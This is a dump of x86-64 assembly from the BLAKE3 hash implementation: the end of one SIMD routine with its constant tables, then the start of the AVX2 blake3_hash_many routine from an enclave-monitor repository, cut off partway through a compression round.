vextracti128 XMMWORD PTR [r9+0x40],ymm0,0x1
vextracti128 XMMWORD PTR [r9+0x50],ymm1,0x1
vextracti128 XMMWORD PTR [r9+0x60],ymm2,0x1
vextracti128 XMMWORD PTR [r9+0x70],ymm3,0x1
vmovdqu xmm0,XMMWORD PTR [rsp+0x8]
vmovdqu xmm1,XMMWORD PTR [rsp+0x48]
vmovdqa XMMWORD PTR [rsp],xmm0
vmovdqa XMMWORD PTR [rsp+0x40],xmm1
add r9,0x80
sub r10,0x2
2:
test r10,0x1
je 9b
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
vmovd xmm14,DWORD PTR [rsp]
vpinsrd xmm14,xmm14,DWORD PTR [rsp+0x40],0x1
vpinsrd xmm14,xmm14,edx,0x2
vmovdqa xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vpinsrd xmm3,xmm14,r8d,0x3
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
jmp 9b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
INDEX0:
.long 0, 1, 2, 3, 16, 17, 18, 19
.long 8, 9, 10, 11, 24, 25, 26, 27
INDEX1:
.long 4, 5, 6, 7, 20, 21, 22, 23
.long 12, 13, 14, 15, 28, 29, 30, 31
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
.long 8, 9, 10, 11, 12, 13, 14, 15
ADD1: .long 1
ADD16: .long 16
BLAKE3_BLOCK_LEN:
.long 64
.p2align 6
BLAKE3_IV:
BLAKE3_IV_0:
.long 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A
|
mit-enclaves/argos-monitor | 66,050 | C/libraries/sdktyche/loader/blake3_avx2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx2
.global blake3_hash_many_avx2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx2:
blake3_hash_many_avx2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 680
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
vmovd xmm0, r9d
vpbroadcastd ymm0, xmm0
vmovdqa ymmword ptr [rsp+0x280], ymm0
vpand ymm1, ymm0, ymmword ptr [ADD0+rip]
vpand ymm2, ymm0, ymmword ptr [ADD1+rip]
vmovdqa ymmword ptr [rsp+0x220], ymm2
vmovd xmm2, r8d
vpbroadcastd ymm2, xmm2
vpaddd ymm2, ymm2, ymm1
vmovdqa ymmword ptr [rsp+0x240], ymm2
vpxor ymm1, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm2, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm1, ymm2
shr r8, 32
vmovd xmm3, r8d
vpbroadcastd ymm3, xmm3
vpsubd ymm3, ymm3, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm3
shl rdx, 6
mov qword ptr [rsp+0x2A0], rdx
cmp rsi, 8
jc 3f
2:
vpbroadcastd ymm0, dword ptr [rcx]
vpbroadcastd ymm1, dword ptr [rcx+0x4]
vpbroadcastd ymm2, dword ptr [rcx+0x8]
vpbroadcastd ymm3, dword ptr [rcx+0xC]
vpbroadcastd ymm4, dword ptr [rcx+0x10]
vpbroadcastd ymm5, dword ptr [rcx+0x14]
vpbroadcastd ymm6, dword ptr [rcx+0x18]
vpbroadcastd ymm7, dword ptr [rcx+0x1C]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x20]
mov r13, qword ptr [rdi+0x28]
mov r14, qword ptr [rdi+0x30]
mov r15, qword ptr [rdi+0x38]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x2A0]
cmove eax, ebx
mov dword ptr [rsp+0x200], eax
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x40], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x40]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x40], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x40], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x40]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x40], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x20], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x40], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x60], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x30]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x30], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x30], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x30]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x30], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x30], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x80], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0xA0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0xC0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0xE0], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x20], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x20]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x20], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x20], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x20]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x20], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x100], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x120], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x140], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x160], ymm11
vmovups xmm8, xmmword ptr [r8+rdx-0x10]
vinsertf128 ymm8, ymm8, xmmword ptr [r12+rdx-0x10], 0x01
vmovups xmm9, xmmword ptr [r9+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r13+rdx-0x10], 0x01
vunpcklpd ymm12, ymm8, ymm9
vunpckhpd ymm13, ymm8, ymm9
vmovups xmm10, xmmword ptr [r10+rdx-0x10]
vinsertf128 ymm10, ymm10, xmmword ptr [r14+rdx-0x10], 0x01
vmovups xmm11, xmmword ptr [r11+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r15+rdx-0x10], 0x01
vunpcklpd ymm14, ymm10, ymm11
vunpckhpd ymm15, ymm10, ymm11
vshufps ymm8, ymm12, ymm14, 136
vmovaps ymmword ptr [rsp+0x180], ymm8
vshufps ymm9, ymm12, ymm14, 221
vmovaps ymmword ptr [rsp+0x1A0], ymm9
vshufps ymm10, ymm13, ymm15, 136
vmovaps ymmword ptr [rsp+0x1C0], ymm10
vshufps ymm11, ymm13, ymm15, 221
vmovaps ymmword ptr [rsp+0x1E0], ymm11
vpbroadcastd ymm15, dword ptr [rsp+0x200]
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm0, ymmword ptr [rsp+0x240]
vpxor ymm13, ymm1, ymmword ptr [rsp+0x260]
vpxor ymm14, ymm2, ymmword ptr [BLAKE3_BLOCK_LEN+rip]
vpxor ymm15, ymm3, ymm15
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [BLAKE3_IV_0+rip]
vpaddd ymm9, ymm13, ymmword ptr [BLAKE3_IV_1+rip]
vpaddd ymm10, ymm14, ymmword ptr [BLAKE3_IV_2+rip]
vpaddd ymm11, ymm15, ymmword ptr [BLAKE3_IV_3+rip]
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x100]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xE0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x160]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
